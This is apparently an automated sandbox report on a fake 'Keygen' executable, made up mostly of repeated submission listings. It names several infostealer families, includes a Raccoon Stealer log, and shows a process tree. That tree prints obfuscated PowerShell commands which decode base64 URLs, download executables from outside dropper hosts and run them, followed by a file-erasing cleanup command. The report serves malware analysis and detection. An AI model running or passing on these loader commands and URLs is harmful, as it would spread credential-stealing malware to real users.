Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    153s
  • max time network
    163s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    01-10-2020 20:51

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (100) — копия.exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 04:01:18 GMT Bot_ID: 750D7400-3B08-415E-A8B0-2695D81425F5_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 0 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.13 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: UCQFZDUI - Username: Admin - Windows version: NT 6.1 - Product name: Windows 7 Professional - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 2047 MB (475 MB used) - Screen resolution: 1280x720 - Display devices: 0) Standard VGA Graphics Adapter ============

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader First Stage 3 IoCs
  • ModiLoader Second Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 34 IoCs
  • Loads dropped DLL 63 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 12 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies Internet Explorer settings 1 TTPs 6 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (100) — копия.exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (100) — копия.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1468
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\D24D.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (100) — ?????.exe""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1760
      • C:\Users\Admin\AppData\Local\Temp\D24D.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1732
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\D24D.tmp\m.hta"
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1864
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1964
          • C:\Users\Public\ofq.exe
            "C:\Users\Public\ofq.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2760
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2856
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:3008
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 3008 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\862065516859913\\* & exit
                  8⤵
                    PID:760
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 3008
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2100
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2900
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:3024
              • C:\Users\Public\ofq.exe
                "C:\Users\Public\ofq.exe"
                6⤵
                • Executes dropped EXE
                PID:2964
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\D24D.tmp\m1.hta"
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:1812
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1972
        • C:\Windows\SysWOW64\timeout.exe
          timeout 1
          3⤵
          • Delays execution with timeout.exe
          PID:1804
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\D24D.tmp\b.hta"
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:1632
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
            4⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1940
            • C:\Users\Public\lks.exe
              "C:\Users\Public\lks.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2736
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                6⤵
                • Loads dropped DLL
                PID:2996
                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1152
                  • C:\Windows\SysWOW64\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                    8⤵
                    • Loads dropped DLL
                    PID:1132
                    • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                      "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                      9⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
